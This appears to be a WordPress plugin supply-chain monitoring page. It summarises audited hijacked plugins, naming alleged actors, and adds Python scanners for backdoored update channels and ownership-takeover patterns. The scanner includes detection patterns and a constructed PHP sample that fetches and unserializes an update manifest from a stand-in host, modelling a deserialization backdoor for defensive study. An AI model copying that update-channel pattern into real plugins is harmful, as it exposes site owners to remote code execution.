Watching the WordPress plugin supply chain.

WP Beacon tracks every plugin on wordpress.org — its authors, committers, and releases — to flag ownership transfers, dormant-then-activated takeovers, and release patterns that match known attacks.

Plugins watched: 112,853 (49,691 closed)
Authors tracked: 68,494
Installs covered: 338.2M+ active installs across all plugins
Forensic audits: 19 (13 malicious)

Active plugin hijacks

Plugins where a malicious author still controls the wordpress.org distribution. Each card links to the full audit, its IOCs, and the steps the author can take to clear the label. A label clears automatically once wp beacon scan-deltas confirms the hijack is gone from trunk.

Closed by wp.org · trunk uncleaned
Quick Page/Post Redirect Plugin — 70k+ installs
The original author intentionally weaponized wordpress.org distribution to seed an out-of-band update channel they controlled — and then served tampered builds through that channel after the wp.org-distributed code went…
Actor: anadnet — original wp.org plugin author. Self-implanted backdoor, no acquisition or account inheritance involv…
Audit #13 · 12 IOCs

Closed by wp.org · trunk uncleaned
33 plugins — 180k+ active installs
Marketplace acquisition of an established 30-plugin portfolio used as a vehicle for a fleet-wide PHP-deserialization RCE backdoor with on-chain C2 resolution.
Actor: "Kris" — Flippa buyer of the WP Online Support / Essential Plugin portfolio (~33 plugins, six figures, early 2…
Audit #4 · 15 IOCs

Closed by wp.org · trunk uncleaned
Scroll To Top — 20k+ installs
Update-checker hijack with active stored-XSS / RCE primitives served from a Panama-fronted C2.
Actor: Benjamin (wp.org @milkitall, GitHub tombenj, tomgolan@gmail.com) — operates the inherited @satrya SVN account
Audit #12 · 11 IOCs

Closed by wp.org · trunk uncleaned
27 plugins — 5k+ active installs
SiteGuarding 27-plugin portfolio (2013-2020) — 15 plugins shipped the siteguarding_tools.php v1.7 RCE backdoor inline in the plugin folder; 12 sibling plugins shipped phone-home guideline violations. wp.org closed all 27 in…
Actor: SiteGuarding (SafetyBis Ltd. — Cyprus HE 232905, dissolved 2016-01-11). 13-year operation, 27 plugins under @s…
Audit #28 · 7 IOCs

Closed by wp.org · trunk uncleaned
Web Image Optimization X — 100 installs
Attacker-controlled side-channel update endpoint shipped under the cover of "license validation" — same operator (SiteGuarding) and same sibling-plugin pair as audit #25 (wp-advanced-math-captcha). Where the wp-advanced-…
Actor: SiteGuarding (cmsplughub.com C2; wp.org account @dalielsam, sole plugin)
Audit #26 · 15 IOCs
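The mechanisms these cards describe, an update check wired to an operator-controlled host, unserialize() on data the operator supplies, and phone-home calls to hosts outside wordpress.org, leave recognisable traces in plugin source. What follows is an added example, not WP Beacon's scanner and not code from any audited plugin: a line-oriented triage pass over PHP that flags the WordPress update-transient filters (real hook names, but self-hosted and premium update checkers use them legitimately too, so a hit is a signal for review, not proof of compromise), unserialize() fed from request or remote-response data, and URLs whose host is outside an allowlist. The allowlist, the two plugin files and the example.invalid host are constructed for the example.

```python
import re
from typing import Optional
from urllib.parse import urlparse

# Hosts a wp.org-distributed plugin is expected to contact for updates and info.
# The allowlist is an assumption for this example; extend it per review.
ALLOWED_HOSTS = {"api.wordpress.org", "downloads.wordpress.org", "wordpress.org"}

# WordPress filters through which a plugin can inject its own update source.
# Real hook names; also used legitimately by self-hosted update checkers.
UPDATE_HOOK_RE = re.compile(
    r'''add_filter\s*\(\s*['"](pre_set_site_transient_update_plugins'''
    r'''|site_transient_update_plugins|update_plugins_[\w.-]+)['"]''')
URL_RE = re.compile(r'''https?://[^\s'"()]+''')
UNSERIALIZE_RE = re.compile(r"\bunserialize\s*\(")
# Data an operator can control: request parameters, raw body, or an HTTP response.
UNTRUSTED_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b|php://input|wp_remote_retrieve_body")


def scan_php(path: str, source: str) -> list:
    """Line-oriented triage of one PHP file; findings come back in source order."""
    findings = []
    for lineno, text in enumerate(source.splitlines(), 1):
        text = text.strip()
        if text.startswith(("//", "#", "/*", "*")):
            continue  # crude comment skip, adequate for triage
        if UPDATE_HOOK_RE.search(text):
            findings.append(dict(file=path, line=lineno, kind="custom_update_channel", detail=text))
        for url in URL_RE.findall(text):
            host = urlparse(url).hostname
            if host and host not in ALLOWED_HOSTS:
                findings.append(dict(file=path, line=lineno, kind="external_host", detail=host))
        if UNSERIALIZE_RE.search(text) and UNTRUSTED_RE.search(text):
            findings.append(dict(file=path, line=lineno, kind="unserialize_untrusted", detail=text))
    return findings


def triage(findings: list) -> Optional[str]:
    """Escalate when an update hook is paired with an external host or an untrusted unserialize()."""
    kinds = {f["kind"] for f in findings}
    if "custom_update_channel" in kinds and kinds & {"external_host", "unserialize_untrusted"}:
        return "update_channel_hijack_candidate"
    if "unserialize_untrusted" in kinds:
        return "deserialization_candidate"
    if "external_host" in kinds:
        return "phone_home_candidate"
    return None


# Constructed sample: an update check disguised as license validation that pulls a
# serialized manifest from an operator-controlled host (not any real plugin's code).
SUSPECT_PHP = r"""<?php
/* Plugin Name: Example Widget */
add_filter('pre_set_site_transient_update_plugins', 'ew_check_update');
function ew_check_update($transient) {
    // "license validation" that really fetches an update manifest from the operator's host
    $resp = wp_remote_get('https://license.example.invalid/api/v1/check?slug=example-widget');
    $data = unserialize(wp_remote_retrieve_body($resp));
    $transient->response['example-widget/example-widget.php'] = $data;
    return $transient;
}
"""

# Constructed sample: plugin info fetched from wp.org and decoded as JSON, nothing to flag.
CLEAN_PHP = r"""<?php
/* Plugin Name: Example Clean */
function ec_fetch_info() {
    $resp = wp_remote_get('https://api.wordpress.org/plugins/info/1.2/?action=plugin_information&request[slug]=example-clean');
    return json_decode(wp_remote_retrieve_body($resp), true);
}
"""

if __name__ == "__main__":
    for name, src in (("example-widget.php", SUSPECT_PHP), ("example-clean.php", CLEAN_PHP)):
        found = scan_php(name, src)
        for f in found:
            print(f"{f['file']}:{f['line']} {f['kind']}: {f['detail']}")
        print(f"{name}: {triage(found)}")
```

Run over an extracted plugin directory, the "update_channel_hijack_candidate" label is the one worth a human's time first; the external_host finding alone is common in legitimate plugins and is what the SiteGuarding siblings' phone-home violations look like at this granularity.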

Top authors by install base


The accounts with the biggest blast radius on wp.org. A new committer suddenly appearing under any of these is always worth a second look.

1. Syed Balkhi · member since 2008-06-22 · 94 plugins · 23.5M+ installs
2. Automattic · member since 2009-11-05 · 75 plugins · 19.1M+ installs
3. Yoast · member since 2013-11-14 · 7 plugins · 14.2M+ installs
4. Elementor · member since 2018-05-10 · 12 plugins · 12.1M+ installs
5. WordPress.org · member since 2010-03-24 · 19 plugins · 11.6M+ installs
6. Rock Lobster Inc. · member since 2025-09-17 · 6 plugins · 11.1M+ installs
7. Brainstorm Force · member since 2011-09-08 · 32 plugins · 7.8M+ installs
8. LiteSpeed Technologies · member since 2016-01-20 · 2 plugins · 7M+ installs
9. David Anderson / Team Updraft · member since 2008-01-02 · 16 plugins · 6.4M+ installs
10. Google · member since 2006-11-17 · 3 plugins · 5.1M+ installs
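The checks the page describes, ownership transfers, a committer suddenly appearing, and a dormant plugin waking up with a release, come down to diffing successive metadata snapshots. The block below is an added example and not WP Beacon's code (the scan_deltas name only echoes the command the page mentions): it takes two snapshots in a constructed, simplified record shape (the real wp.org API and SVN data differ), flags ownership changes, committer additions and removals, and a release after a long gap, then escalates when a control change coincides with the first release after dormancy or lands on a plugin above a blast-radius threshold. The thresholds, field names and the three sample plugins are assumptions.

```python
from dataclasses import dataclass
from datetime import date

# Thresholds are assumptions for this example, not WP Beacon's.
DORMANCY_DAYS = 365       # a release after a gap this long counts as "dormant, then activated"
BLAST_RADIUS = 100_000    # above this install count, any control change is reviewed regardless


@dataclass(frozen=True)
class PluginState:
    """One snapshot of a plugin listing (constructed, simplified shape)."""
    slug: str
    owner: str                  # wp.org account that owns the listing
    committers: frozenset       # SVN accounts with commit access
    last_release: date          # date of the latest tagged release
    active_installs: int


def diff_plugin(prev: PluginState, curr: PluginState) -> list:
    """Compare consecutive snapshots of one plugin. Assumes snapshots are taken
    often (e.g. daily), so the gap between successive last_release values is a
    real release gap and not several releases collapsed into one."""
    findings = []
    if prev.owner != curr.owner:
        findings.append({"kind": "ownership_transfer", "detail": f"{prev.owner} -> {curr.owner}"})
    for acct in sorted(curr.committers - prev.committers):
        findings.append({"kind": "new_committer", "detail": acct})
    for acct in sorted(prev.committers - curr.committers):
        findings.append({"kind": "committer_removed", "detail": acct})
    gap_days = (curr.last_release - prev.last_release).days
    if gap_days > DORMANCY_DAYS:  # positive gap means a release happened in this interval
        findings.append({"kind": "dormant_reactivated", "detail": f"{gap_days} days since previous release"})

    kinds = {f["kind"] for f in findings}
    control_changed = bool(kinds & {"ownership_transfer", "new_committer"})
    if control_changed and "dormant_reactivated" in kinds:
        findings.append({"kind": "takeover_pattern", "detail": "control change plus first release after dormancy"})
    elif control_changed and curr.active_installs >= BLAST_RADIUS:
        findings.append({"kind": "high_blast_radius_change", "detail": f"{curr.active_installs:,} installs"})
    for f in findings:
        f["slug"] = curr.slug
    return findings


def scan_deltas(prev: dict, curr: dict) -> list:
    """Diff two whole snapshots keyed by slug; plugins absent from either side are skipped."""
    out = []
    for slug in sorted(prev.keys() & curr.keys()):
        out.extend(diff_plugin(prev[slug], curr[slug]))
    return out


# Constructed snapshots (hypothetical slugs and accounts): a dormant plugin sold and
# immediately re-released, a large vendor adding a committer, and a quiet small plugin.
PREV = {
    "example-redirect": PluginState("example-redirect", "origdev", frozenset({"origdev"}), date(2023, 1, 10), 70_000),
    "example-seo": PluginState("example-seo", "bigvendor", frozenset({"bigvendor", "bv-release"}), date(2025, 3, 1), 2_000_000),
    "example-steady": PluginState("example-steady", "solo", frozenset({"solo"}), date(2025, 3, 1), 500),
}
CURR = {
    "example-redirect": PluginState("example-redirect", "newbuyer", frozenset({"newbuyer"}), date(2025, 3, 4), 70_000),
    "example-seo": PluginState("example-seo", "bigvendor", frozenset({"bigvendor", "bv-release", "contractor7"}), date(2025, 3, 3), 2_000_000),
    "example-steady": PluginState("example-steady", "solo", frozenset({"solo"}), date(2025, 3, 2), 500),
}

if __name__ == "__main__":
    for f in scan_deltas(PREV, CURR):
        print(f"{f['slug']}: {f['kind']} ({f['detail']})")
```

The takeover_pattern label is the one that matches the acquisition-then-backdoor cases on this page; a new_committer under a multi-million-install account is noisier, which is why it only escalates on blast radius rather than on its own.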

Recent closures
